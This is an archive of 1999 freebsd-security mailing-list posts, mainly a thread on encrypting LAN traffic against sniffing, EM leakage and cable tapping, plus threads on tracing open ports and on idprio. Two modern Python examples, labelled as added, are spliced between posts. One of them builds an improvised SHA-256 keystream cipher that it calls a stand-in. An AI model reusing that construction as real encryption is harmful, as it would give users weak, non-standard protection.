Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id XAA04854; Tue, 7 Sep 1999 23:31:18 -0700 (PDT)
From: dmp@aracnet.com
Message-ID: <37D60350.6E85A7A1@aracnet.com>
Date: Tue, 07 Sep 1999 23:33:52 -0700
X-Mailer: Mozilla 4.6 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Garrett Wollman
Cc: ks@itp.ac.ru, freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
References: <37D4BCC2.34AFAE9D@aracnet.com> <199909071339.JAA11485@khavrinen.lcs.mit.edu>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Garrett Wollman wrote:
> <
>> I have two problems. The first is that EM emissions on UTP allows
>> one to monitor all traffic on that cable.
>
> Use fiber NICs.

Short of winning a significant lottery, it would be economically impossible to move the network to fibre, there are too many nodes to upgrade.

>> The second is that a
>> sniffer run on an authorized machine will be able to see the source
>> and destination IP and port of all IP traffic on its segment.
>
> Use a good switch and hard-wire the bridge table.

The network currently can't be segmented any more than it is without breaking its applications.

From owner-freebsd-security Tue Sep 7 23:47:10 1999
Delivered-To: freebsd-security@freebsd.org
Received: from netserv1.chg.ru (netserv1.chg.ru [193.233.46.3]) by hub.freebsd.org (Postfix) with ESMTP id A085914FF9 for ; Tue, 7 Sep 1999 23:47:02 -0700 (PDT) (envelope-from ks@chg.ru)
Received: from speecart.chg.ru (speecart.chg.ru [193.233.46.2]) by netserv1.chg.ru (8.9.3/8.9.1) with ESMTP id KAA45640; Wed, 8 Sep 1999 10:44:19 +0400 (MSD)
Message-ID:
X-Mailer: XFMail 1.3 [p0] on FreeBSD
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=KOI8-R
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
In-Reply-To: <37D60350.6E85A7A1@aracnet.com>
Date: Wed, 08 Sep 1999 10:41:47 +0400 (MSD)
Organization: Landau Institute for Theoretical Physics
From: "Sergey S. Kosyakov"
To: dmp@aracnet.com
Subject: Re: Layer 2 ethernet encryption?
Cc: freebsd-security@FreeBSD.ORG
Cc: freebsd-security@FreeBSD.ORG, Garrett Wollman
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 08-Sep-99 dmp@aracnet.com wrote:
> Garrett Wollman wrote:
>> <
>>> I have two problems. The first is that EM emissions on UTP allows
>>> one to monitor all traffic on that cable.
>>
>> Use fiber NICs.
>
> Short of winning a significant lottery, it would be economically
> impossible to move the network to fibre, there are too many nodes to
> upgrade.
Security was always expensive :-) More security, more expenses.

>>> The second is that a
>>> sniffer run on an authorized machine will be able to see the source
>>> and destination IP and port of all IP traffic on its segment.
>>
>> Use a good switch and hard-wire the bridge table.
>
> The network currently can't be segmented any more than it is without
> breaking its applications.

1. I don't understand. What do you mean "breaking its applications"?
2. Do you think about huge CPU load on each host in the case of "too many nodes"? In the case of layer2 encryption each host must decrypt each packet in the segment, or at least each packet header.

---
----------------------------------
Sergey Kosyakov
Laboratory of Distributed Computing
Department of High-Performance Computing and Applied Network Research
Landau Institute for Theoretical Physics
E-Mail: ks@chg.ru
Date: 08-Sep-99
Time: 10:36:35
----------------------------------
---

From owner-freebsd-security Wed Sep 8 00:50:17 1999
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 5F024154A3 for ; Wed, 8 Sep 1999 00:50:13 -0700 (PDT) (envelope-from des@flood.ping.uio.no)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id JAA31928; Wed, 8 Sep 1999 09:49:25 +0200 (CEST) (envelope-from des)
To: John-Mark Gurney
Cc: Sheldon Hearn , sthaug@nethelp.no, madrapour@hotmail.com, freebsd-security@FreeBSD.ORG
Subject: Re: Tracing open ports on FreeBSD
References: <36622.936445305@verdi.nethelp.no> <28018.936617908@axl.noc.iafrica.com> <19990907122621.30662@hydrogen.fircrest.net>
From: Dag-Erling Smorgrav
Date: 08 Sep 1999 09:49:24 +0200
In-Reply-To: John-Mark Gurney's message of "Tue, 7 Sep 1999 12:26:21 -0700"
Message-ID:
Lines: 17
X-Mailer: Gnus v5.5/Emacs 19.34
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

John-Mark Gurney writes:
> no, but we should include a reference to fstat... you can track down
> who had a udp socket open, but for some reason the addresses on my 3.0-R
> box for tcp streams output by netstat don't agree w/ any of the
> addresses that exist in the fstat output...

I fixed that bug a long time ago. What are you doing still running 3.0-R, anyway?

> looks like I should extend the description of -A to include a blurb
> about identifying processes which own a socket/stream...

Why? What's wrong with sockstat?

DES
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From owner-freebsd-security Wed Sep 8 01:04:06 1999
Delivered-To: freebsd-security@freebsd.org
Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id 2FDFA15084 for ; Wed, 8 Sep 1999 01:04:05 -0700 (PDT) (envelope-from dmp@aracnet.com)
Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id BAA11486; Wed, 8 Sep 1999 01:00:38 -0700 (PDT)
From: dmp@aracnet.com
Message-ID: <37D61842.663D324A@aracnet.com>
Date: Wed, 08 Sep 1999 01:03:14 -0700
X-Mailer: Mozilla 4.6 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: grub
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
References: <37D4CA23.6A64FCAC@aracnet.com> <37D38AB0.D4871A@grub.net>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

grub wrote:
> dmp@aracnet.com wrote:
> > In order:
> >
> > A machine on the network can't see any other machine other than its
> > firewall interface until the DC authorizes its presence.
> >
> > Managed switches aren't used, we haven't found one that can provide
> > a high enough level of security.
> >
> > The server rooms already are locked.
>
> This is an interesting thread but I have a solution: "Sneaker Net" :)

We found that most of us would require unhealthy amounts of anabolic steroids and intense weight training to achieve sufficient bandwidth.

From owner-freebsd-security Wed Sep 8 01:10:13 1999
Delivered-To: freebsd-security@freebsd.org
Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id 332B014F6C for ; Wed, 8 Sep 1999 01:10:08 -0700 (PDT) (envelope-from dmp@aracnet.com)
Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id BAA11745; Wed, 8 Sep 1999 01:03:48 -0700 (PDT)
From: dmp@aracnet.com
Message-ID: <37D61900.E0E8144C@aracnet.com>
Date: Wed, 08 Sep 1999 01:06:24 -0700
X-Mailer: Mozilla 4.6 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: James Wyatt
Cc: David Miner , "Rodney W. Grimes" , ck@adsu.bellsouth.com, bryan@valiant.cis.hcc.cc.il.us, freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

James Wyatt wrote:
>
> There are nice 10bT to fiber (fibre in the UK) converters in the BlackBox
> catalog (catalogue). You could put these oh-so-close to the router or
> switch in the equipment space - maybe even braid the 10bT cables to
> confuse any listeners there. Then 10bF cards in the machines ensure no EMI
> emitted in the unsecure area. - Jy@

You'll still have EM leakage at the converter and insecure traffic. Plus, you can tap a fibre line almost as easily as you can tap a UTP line.
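To make concrete what dmp@aracnet.com asked for earlier in this thread (everything above layer 2 encrypted, with only the source and destination MAC addresses determinable), the following added example builds a constructed IPv4/UDP frame, encrypts the EtherType and everything after it, and shows what a passive listener on the segment can read before and after. It is not code from anyone on this list. The key, addresses and payload are constructed; the keystream (SHA-256 in counter mode) and HMAC-SHA256 tag are a stand-in used only because the Python standard library has no authenticated cipher, and a real device would use a standard one such as AES-GCM; the EtherType 0x88B5 (an IEEE 802 local-experimental value) is an assumption about what such a private scheme would carry:

```python
"""What encrypting everything above layer 2 hides from a listener on the segment.

Added illustration for the "Layer 2 ethernet encryption?" thread, not code from
anyone in it. Standard library only: the keystream is SHA-256 in counter mode
and the tag is HMAC-SHA256 (encrypt-then-MAC), a stand-in for a real
authenticated cipher such as AES-GCM. Keys, addresses and payload are constructed.
"""
import hashlib
import hmac
import os
import struct

ETHERTYPE_IPV4 = 0x0800
ETHERTYPE_PRIVATE = 0x88B5   # IEEE 802 local-experimental EtherType, assumed for this scheme
NONCE_LEN = 12
TAG_LEN = 16


def mac_bytes(text):
    return bytes(int(x, 16) for x in text.split(":"))


def mac_text(raw):
    return ":".join("%02x" % b for b in raw)


def ip_bytes(text):
    return bytes(int(x) for x in text.split("."))


def ipv4_checksum(header):
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_frame(dst_mac, src_mac, src_ip, dst_ip, sport, dport, payload):
    """Constructed Ethernet II frame carrying IPv4/UDP: what the wire carries in clear."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0x1234, 0, 64, 17, 0,
                     ip_bytes(src_ip), ip_bytes(dst_ip))
    ip = ip[:10] + struct.pack("!H", ipv4_checksum(ip)) + ip[12:]
    return mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ETHERTYPE_IPV4) + ip + udp


def derive_keys(master):
    """Separate encryption and authentication keys from one shared segment key."""
    return (hmac.new(master, b"l2-enc", hashlib.sha256).digest(),
            hmac.new(master, b"l2-mac", hashlib.sha256).digest())


def keystream(enc_key, nonce, length):
    out = bytearray()
    block = 0
    while len(out) < length:
        out += hashlib.sha256(enc_key + nonce + struct.pack("!I", block)).digest()
        block += 1
    return bytes(out[:length])


def xor(data, pad):
    return bytes(a ^ b for a, b in zip(data, pad))


def encrypt_frame(master, frame, nonce=None):
    """Keep the 12 address bytes in clear; encrypt the EtherType and everything after
    it; authenticate addresses, nonce and ciphertext together. The nonce must never
    repeat under one key, so a deployment would use a counter, not a random value."""
    enc_key, mac_key = derive_keys(master)
    nonce = os.urandom(NONCE_LEN) if nonce is None else nonce
    addrs, rest = frame[:12], frame[12:]
    body = struct.pack("!H", ETHERTYPE_PRIVATE) + nonce + xor(rest, keystream(enc_key, nonce, len(rest)))
    tag = hmac.new(mac_key, addrs + body, hashlib.sha256).digest()[:TAG_LEN]
    return addrs + body + tag


def decrypt_frame(master, frame):
    """Verify before parsing anything: an unauthenticated frame is dropped, not decoded."""
    enc_key, mac_key = derive_keys(master)
    addrs, body, tag = frame[:12], frame[12:-TAG_LEN], frame[-TAG_LEN:]
    expect = hmac.new(mac_key, addrs + body, hashlib.sha256).digest()[:TAG_LEN]
    if not hmac.compare_digest(tag, expect):
        raise ValueError("frame authentication failed")
    if struct.unpack("!H", body[:2])[0] != ETHERTYPE_PRIVATE:
        raise ValueError("not a protected frame")
    nonce, ct = body[2:2 + NONCE_LEN], body[2 + NONCE_LEN:]
    return addrs + xor(ct, keystream(enc_key, nonce, len(ct)))


def rejects_tampering(master, frame, offset):
    """True if flipping one bit at offset makes the receiver drop the frame."""
    damaged = bytearray(frame)
    damaged[offset] ^= 0x01
    try:
        decrypt_frame(master, bytes(damaged))
    except ValueError:
        return True
    return False


def sniffer_view(frame):
    """Everything a passive listener without the key can read from one frame."""
    view = {"dst_mac": mac_text(frame[:6]), "src_mac": mac_text(frame[6:12]),
            "ethertype": struct.unpack("!H", frame[12:14])[0], "length": len(frame)}
    if view["ethertype"] == ETHERTYPE_IPV4:
        ip = frame[14:34]
        view["src_ip"] = ".".join(str(b) for b in ip[12:16])
        view["dst_ip"] = ".".join(str(b) for b in ip[16:20])
        if ip[9] == 17:                      # UDP: ports follow the IP header
            view["sport"], view["dport"] = struct.unpack("!HH", frame[34:38])
    return view


if __name__ == "__main__":
    key = b"constructed-demo-key-not-for-real-use"
    clear = build_frame("02:00:00:00:00:02", "02:00:00:00:00:01",
                        "10.0.0.1", "10.0.0.2", 40000, 53, b"query")
    protected = encrypt_frame(key, clear)
    print("clear    :", sniffer_view(clear))
    print("protected:", sniffer_view(protected))
    assert decrypt_frame(key, protected) == clear
```

The view of the protected frame shows what does not change: both MAC addresses, the frame length and the fact that the two stations are talking, so traffic analysis is still possible even though IP addresses and ports are hidden. Every frame also has to be authenticated by every receiver on the segment before it can be parsed, which is the per-host CPU cost Sergey Kosyakov raised earlier in the thread.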
From owner-freebsd-security Wed Sep 8 01:30:59 1999
From: dmp@aracnet.com
Date: Wed, 08 Sep 1999 01:29:29 -0700
To: The Mad Scientist
Cc: ks@itp.ac.ru, freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
Message-ID: <37D61E69.58B806DF@aracnet.com>
References: <4.1.19990907190442.0096ada0@mail.thegrid.net>

The Mad Scientist wrote:
> I do not claim to understand driver writing, but what about ripping out
> the code that puts the NIC into promiscuous mode?

I'm not a software hacker, so I couldn't tell you if that would work,
but disabling that part of the driver might not be such a good idea.

> You would have to modify
> the code that allows the driver to change its MAC address, probably. But
> if you have good network monitors, you should be able to detect a machine
> that is pretending to be someone else pretty quickly. It's not encryption,
> but if you're blind, you can't read the written word. It doesn't solve
> your EM problems either.

If a NIC changed its MAC, it would lose connectivity.

> 'Course, I guess any user with half a brain could go out and get the
> original driver and put it in place -- this being an open source solution.
> So, I guess it's not such a good idea after all.
Integrity checks notwithstanding, such a modification would prevent the
machine from connecting to the network.

From owner-freebsd-security Wed Sep 8 01:36:46 1999
From: Jonas Eriksson
Date: Wed, 8 Sep 1999 10:35:20 +0200 (CEST)
To: dmp@aracnet.com
Cc: The Mad Scientist, ks@itp.ac.ru, freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
In-Reply-To: <37D61E69.58B806DF@aracnet.com>

On Wed, 8 Sep 1999 dmp@aracnet.com wrote:
> The Mad Scientist wrote:
>
> > I do not claim to understand driver writing, but what about ripping out
> > the code that puts the NIC into promiscuous mode?
>
> I'm not a software hacker, so I couldn't tell you if that would work,
> but disabling that part of the driver might not be such a good idea.
>

There are some cards on the market that you can't set to promisc mode.
Maybe someone on the list has more information about this?
--
Jonas Eriksson

From owner-freebsd-security Wed Sep 8 01:48:49 1999
From: dmp@aracnet.com
Date: Wed, 08 Sep 1999 01:45:17 -0700
To: "Sergey S. Kosyakov"
Cc: freebsd-security@FreeBSD.ORG, Garrett Wollman
Subject: Re: Layer 2 ethernet encryption?
Message-ID: <37D6221D.82C57D6B@aracnet.com>

"Sergey S. Kosyakov" wrote:
>> Short of winning a significant lottery, it would be economically
>> impossible to move the network to fibre, there's too many nodes to
>> upgrade.
>
> Security was always expensive :-) More security, more expenses.

True, but the resources needed for the upgrade are well beyond our means.

>> The network currently can't be segmented any more than it is without
>> breaking its applications.
>
> 1. I don't understand. What do you mean "breaking its applications".

The applications we run would cease to work properly if the network
was segmented any more than it already is.

> 2. Do you think about the huge CPU load on each host in the case of "too many
> nodes"? In the case of layer2 encryption each host must decrypt each packet in
> the segment, or at least each packet header.

CPU power isn't a concern. Encryption would be handled by the cypher
chip, not the CPU, and the MAC address wouldn't be encrypted.
The cypher encrypts layers 3 and up.

From owner-freebsd-security Wed Sep 8 01:49:15 1999
From: dmp@aracnet.com
Date: Wed, 08 Sep 1999 01:46:37 -0700
To: Nikolaus Spence
Cc: freebsd-security@freebsd.org
Subject: Re: Layer 2 ethernet encryption?
Message-ID: <37D6226D.9AC89FAC@aracnet.com>
References: <85D42D7EE2DAD2119CD400A0C9E1004F64F69A@exchange.eci.us.geac.com>

Nikolaus Spence wrote:
>>> How would you route the traffic? No routers would be able to pass the
>>> traffic.
>>
>> The network in question doesn't use IP-based routing.
>
> If you aren't using IP based routing then aren't your packets going to be
> encapsulated already? how ARE you routing your packets???

By MAC address.
From owner-freebsd-security Wed Sep 8 01:54:43 1999
From: sen_ml@eccosys.com
Date: Wed, 08 Sep 1999 17:47:03 +0900
To: freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
In-Reply-To: <37D4AB40.AEE4C2EA@aracnet.com>
References: <39480.936682378@noop.colo.erols.net> <37D4AB40.AEE4C2EA@aracnet.com>
Message-Id: <19990908174703U.1000@eccosys.com>

dmp> Gary Palmer wrote:

dmp> > If you are doing this for a local LAN, I suggest you have bigger
dmp> > problems :)

dmp> You're right, I do have bigger problems. Like deep paranoia among
dmp> the users of the LAN.

please take the following as humor:

so, what are you going to do when they find out about tempest --
are you going to get special crts/displays?
From owner-freebsd-security Wed Sep 8 01:56:11 1999
From: "Sergey S. Kosyakov"
Organization: Landau Institute for Theoretical Physics
Date: Wed, 08 Sep 1999 12:52:17 +0400 (MSD)
To: dmp@aracnet.com
Cc: Garrett Wollman, freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
In-Reply-To: <37D6221D.82C57D6B@aracnet.com>

On 08-Sep-99 dmp@aracnet.com wrote:
>>> The network currently can't be segmented any more than it is without
>>> breaking its applications.
>>
>> 1. I don't understand. What do you mean "breaking its applications".
>
> The applications we run would cease to work properly if the network
> was segmented any more than it already is.

OK, maybe we have different understandings of the word "network segment".
Who knows a network application which cannot run on an Ethernet network
connected to a switch (except sniffers, of course :-))? It is almost
right that a switch simply suppresses unneeded Ethernet packets, and
therefore makes the network more secure.

>
>> 2. Do you think about the huge CPU load on each host in the case of "too many
>> nodes"? In the case of layer2 encryption each host must decrypt each packet
>> in
>> the segment, or at least each packet header.
>
> CPU power isn't a concern.
> Encryption would be handled by the cypher
> chip, not the CPU, and the MAC address wouldn't be encrypted. The
> cypher encrypts layers 3 and up.

If MAC addresses wouldn't be encrypted, why not use well-known
encryption software, e.g. SSH or TUND or IPSec?

----------------------------------
Sergey Kosyakov
Laboratory of Distributed Computing
Department of High-Performance Computing and Applied Network Research
Landau Institute for Theoretical Physics
E-Mail: ks@chg.ru
Date: 08-Sep-99  Time: 12:45:52
----------------------------------

From owner-freebsd-security Wed Sep 8 01:56:59 1999
From: "Sergey S. Kosyakov"
Organization: Landau Institute for Theoretical Physics
Date: Wed, 08 Sep 1999 12:53:17 +0400 (MSD)
To: dmp@aracnet.com
Cc: freebsd-security@FreeBSD.ORG, Nikolaus Spence
Subject: Re: Layer 2 ethernet encryption?
In-Reply-To: <37D6226D.9AC89FAC@aracnet.com>

On 08-Sep-99 dmp@aracnet.com wrote:
> Nikolaus Spence wrote:
>>>> How would you route the traffic? No routers would be able to pass the
>>>> traffic.
>>>
>>> The network in question doesn't use IP-based routing.
>>
>> If you aren't using IP based routing then aren't your packets going to be
>> encapsulated already? how ARE you routing your packets???
>
> By MAC address.
This is exactly an Ethernet switch :-)

----------------------------------
Sergey Kosyakov
Laboratory of Distributed Computing
Department of High-Performance Computing and Applied Network Research
Landau Institute for Theoretical Physics
E-Mail: ks@chg.ru
Date: 08-Sep-99  Time: 12:52:56
----------------------------------

From owner-freebsd-security Wed Sep 8 02:02:38 1999
From: John-Mark Gurney
Organization: Cu Networking
Date: Wed, 8 Sep 1999 02:01:38 -0700
To: Dag-Erling Smorgrav
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Tracing open ports on FreeBSD
Message-ID: <19990908020138.50271@hydrogen.fircrest.net>
References: <36622.936445305@verdi.nethelp.no> <28018.936617908@axl.noc.iafrica.com> <19990907122621.30662@hydrogen.fircrest.net>

Dag-Erling Smorgrav scribbled this message on Sep 8:
> John-Mark Gurney writes:
> > no, but we should include a reference to fstat...
> > you can track down
> > who had a udp socket open, but for some reason the addresses on my 3.0-R
> > box for tcp streams output by netstat don't agree w/ any of the
> > addresses that exist in the fstat output...
>
> I fixed that bug a long time ago. What are you doing still running
> 3.0-R, anyway?

because it's my gateway, and I haven't had time to try to run unstable
releases like 3.1-R that had a swap problem... and I have been too busy
to try to upgrade to 3.2-R... I just recently built a couple new boxes
that I will be running -current and -stable on, but one of them running
3.2-R panics in process 1 (swapper) upon bootup w/o fail... on top of
all of this, I'm in the process of moving to the SF Bay area...

> > looks like I should extend the description of -A to include a blurb
> > about identifying processes which own a socket/stream...
>
> Why? What's wrong with sockstat?

I just noticed that it is in both -stable and -current, there isn't a
problem, but still, it's useful to know multiple ways to do something..

--
John-Mark Gurney                          Voice: +1 541 684 8449
Cu Networking                             P.O. Box 5693, 97405
"The soul contains in itself the event that shall presently befall it.
The event is only the actualizing of its thought."
 -- Ralph Waldo Emerson

From owner-freebsd-security Wed Sep 8 02:33:52 1999
From: Sheldon Hearn
Date: Wed, 08 Sep 1999 11:32:04 +0200
To: John-Mark Gurney
Cc: sthaug@nethelp.no, madrapour@hotmail.com, freebsd-security@FreeBSD.ORG
Subject: Re: Tracing open ports on FreeBSD
In-reply-to: Your message of "Tue, 07 Sep 1999 12:26:21 MST." <19990907122621.30662@hydrogen.fircrest.net>
Message-ID: <59764.936783124@axl.noc.iafrica.com>

On Tue, 07 Sep 1999 12:26:21 MST, John-Mark Gurney wrote:
> no, but we should include a reference to fstat...

See rev 1.16 of netstat.1 . :-)

Ciao,
Sheldon.
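The netstat/fstat cross-reference John-Mark and Dag-Erling are arguing about, as an added example that is not code from the thread: `netstat -A` prepends the protocol control block (PCB) address to each row and `fstat` prints the same address for socket descriptors, so joining the two on that address names the process behind every port; the two listings below are constructed and their column layouts are assumed, since the real ones vary between releases.

```python
"""Attribute the sockets listed by `netstat -An` to the processes that hold
them in `fstat` output, joined on the protocol control block (PCB) address.
Added example, not code from the thread; samples are constructed and the
column layouts of both tools are assumed."""
import string
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed `netstat -An` sample: -A prepends the PCB address, -n keeps
# addresses numeric, and the last dot in an address separates the port.
NETSTAT_SAMPLE = """\
Active Internet connections (including servers)
Tcpcb    Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
c0b8d5c0 tcp        0      0  192.168.1.5.22         192.168.1.9.1043       ESTABLISHED
c0b8d340 tcp        0      0  *.22                   *.*                    LISTEN
c0b8d700 tcp        0      0  192.168.1.5.22         192.168.1.9.1050       TIME_WAIT
c0b9a000 tcp        0      0  *.6000                 *.*                    LISTEN
c0b7e100 udp        0      0  *.514                  *.*
"""

# Constructed `fstat` sample. Socket rows read
#   USER CMD PID FD* internet <type> <proto> <pcb>
# and carry the same PCB address; rows for other file types are skipped.
FSTAT_SAMPLE = """\
USER     CMD          PID   FD MOUNT      INUM MODE         SZ|DV R/W
root     sshd        1205    3* internet stream tcp c0b8d5c0
root     sshd        1205    4  /           12 crw-rw-rw-   ttyp0 rw
root     sshd         412    3* internet stream tcp c0b8d340
root     syslogd      301    4* internet dgram udp c0b7e100
"""

@dataclass(frozen=True)
class Owner:
    user: str
    cmd: str
    pid: int
    fd: int

@dataclass
class Socket:
    pcb: str
    proto: str
    local: str
    foreign: str
    state: str
    owners: List[Owner] = field(default_factory=list)

def _norm_pcb(token: str) -> str:
    """Lower-case the PCB address and drop the 0x prefix newer fstat prints."""
    token = token.lower()
    return token[2:] if token.startswith("0x") else token

def _is_hex(token: str) -> bool:
    return len(token) >= 4 and all(c in string.hexdigits for c in token)

def parse_netstat(text: str) -> List[Socket]:
    """Data rows start with a hex PCB address; banner and header rows do not."""
    sockets = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or not _is_hex(parts[0]):
            continue
        state = parts[6] if len(parts) > 6 else ""  # UDP rows carry no state
        sockets.append(Socket(_norm_pcb(parts[0]), parts[1], parts[4], parts[5], state))
    return sockets

def parse_fstat(text: str) -> Dict[str, List[Owner]]:
    """PCB address -> every holder; a list, since a socket inherited across
    fork() appears once per process."""
    owners: Dict[str, List[Owner]] = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 8 or not parts[4].startswith("internet"):
            continue  # not an AF_INET/AF_INET6 socket row
        owner = Owner(parts[0], parts[1], int(parts[2]), int(parts[3].rstrip("*")))
        owners.setdefault(_norm_pcb(parts[7]), []).append(owner)
    return owners

def attribute_sockets(netstat_text: str, fstat_text: str) -> List[Socket]:
    """Join the two listings on the PCB address."""
    owners = parse_fstat(fstat_text)
    sockets = parse_netstat(netstat_text)
    for sock in sockets:
        sock.owners = owners.get(sock.pcb, [])
    return sockets

def local_port(addr: str) -> int:
    """'*.514' -> 514, '192.168.1.5.22' -> 22."""
    return int(addr.rsplit(".", 1)[1])

def unowned_sockets(sockets: List[Socket]) -> List[Socket]:
    """Sockets netstat lists but no process holds. TIME_WAIT is expected (the
    kernel keeps those after close); a LISTEN or ESTABLISHED socket with no
    owner deserves a look, or means the two tools disagree on addresses."""
    return [s for s in sockets if not s.owners and s.state != "TIME_WAIT"]

def owners_of_port(sockets: List[Socket], proto: str, port: int) -> List[Owner]:
    """Which processes hold the socket bound to this local port?"""
    return [o for s in sockets
            if s.proto.startswith(proto) and local_port(s.local) == port
            for o in s.owners]
```

On releases that ship sockstat, as John-Mark notes below, it performs this join for you; the script is for the case the thread describes, where you only have the two raw listings.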
From owner-freebsd-security Wed Sep 8 03:13:58 1999
From: "Vladimir Mencl, MK, susSED"
Date: Wed, 8 Sep 1999 12:12:57 +0200 (MET DST)
To: freebsd-security@FreeBSD.ORG
Subject: Q: Why is idprio only for root

Why is the idprio(1) command available only to the superuser?

What were the reasons?

It just seems to me that it's no evil to let users run some computations
on the idle priority.... when they want to load the system less than
with a nice(1).
Vlada Mencl

From owner-freebsd-security Wed Sep 8 03:37:00 1999
From: John-Mark Gurney
Organization: Cu Networking
Date: Wed, 8 Sep 1999 03:35:50 -0700
To: "Vladimir Mencl, MK, susSED"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Q: Why is idprio only for root
Message-ID: <19990908033550.02417@hydrogen.fircrest.net>

Vladimir Mencl, MK, susSED scribbled this message on Sep 8:
> Why is the idprio(1) command available only to the superuser?
>
> What were the reasons?
>
> It just seems to me that it's no evil to let users run some computations
> on the idle priority.... when they want to load the system less than
> with a nice(1).

because there is a situation where an idle prio process can obtain a
lock on a vnode or other kernel resource, but never get the chance to
run again while a higher level process continues working... do a search
of the mailing lists on this topic... it shouldn't be hard to turn up...
it would most likely be on -hackers

--
John-Mark Gurney                          Voice: +1 541 684 8449
Cu Networking                             P.O.
Box 5693, 97405
"The soul contains in itself the event that shall presently befall it.
The event is only the actualizing of its thought."
 -- Ralph Waldo Emerson

From owner-freebsd-security Wed Sep 8 07:21:43 1999
From: dmp@aracnet.com
Date: Wed, 08 Sep 1999 07:20:43 -0700
To: sen_ml@eccosys.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
Message-ID: <37D670BB.51A150D7@aracnet.com>
References: <39480.936682378@noop.colo.erols.net> <37D4AB40.AEE4C2EA@aracnet.com> <19990908174703U.1000@eccosys.com>

sen_ml@eccosys.com wrote:
>
> dmp> Gary Palmer wrote:
>
> dmp> > If you are doing this for a local LAN, I suggest you have bigger
> dmp> > problems :)
>
> dmp> You're right, I do have bigger problems. Like deep paranoia among
> dmp> the users of the LAN.
>
> please take the following as humor:
>
> so, what are you going to do when they find out about tempest --
> are you going to get special crts/displays?

You didn't really think we didn't already have them, did you?
:-)

From owner-freebsd-security Wed Sep 8 08:02:12 1999
From: "Jeffrey J. Mountin"
Date: Wed, 08 Sep 1999 10:00:24 -0500
To: dmp@aracnet.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
Message-Id: <3.0.3.32.19990908100024.01d18800@207.227.119.2>
In-Reply-To: <37D61900.E0E8144C@aracnet.com>

At 01:06 AM 9/8/99 -0700, dmp@aracnet.com wrote:
>James Wyatt wrote:
>>
>> There are nice 10bT to fiber (fibre in the UK) converters in the BlackBox
>> catalog (catalogue). You could put these oh-so-close to the router or
>> switch in the equipment space - maybe even braid the 10bT cables to
>> confuse any listeners there. Then 10bF cards in the machines ensure no EMI
>> emitted in the unsecure area. - Jy@
>
>You'll still have EM leakage at the converter and insecure traffic.
>Plus, you can tap a fibre line almost as easily as you can tap a UTP
>line.

Grounded shield at the converter would solve the EM, but would make moving
connections a real pain.

As for the tapping, it would require a break in the line and that can be
monitored for, but again the expenses go up.
Still if the conduits are in the building, do not use exterior walls, and
access is limited...

Gotta face the fact that one way or the other there is no cheap, easy
solution. One has to wonder why security is so paramount (barring your
admitted paranoia). Or does that require a clearance. 8-)

As for another's mention of TEMPEST, you should check out:

http://www.eskimo.com/~joelm/tempest.html

This should add a bit to my first suggestion on EM.

Jeff Mountin - jeff@mountin.net
Systems/Network Administrator
FreeBSD - the power to serve
'86 Yamaha MaxiumX (not FBSD powered)

From owner-freebsd-security Wed Sep 8 09:22:44 1999
From: dmp@aracnet.com
Date: Wed, 08 Sep 1999 09:21:49 -0700
To: "Jeffrey J. Mountin"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
Message-ID: <37D68D1D.14D6CAC7@aracnet.com>
References: <3.0.3.32.19990908100024.01d18800@207.227.119.2>

"Jeffrey J. Mountin" wrote:
> At 01:06 AM 9/8/99 -0700, dmp@aracnet.com wrote:
>>James Wyatt wrote:
>>>
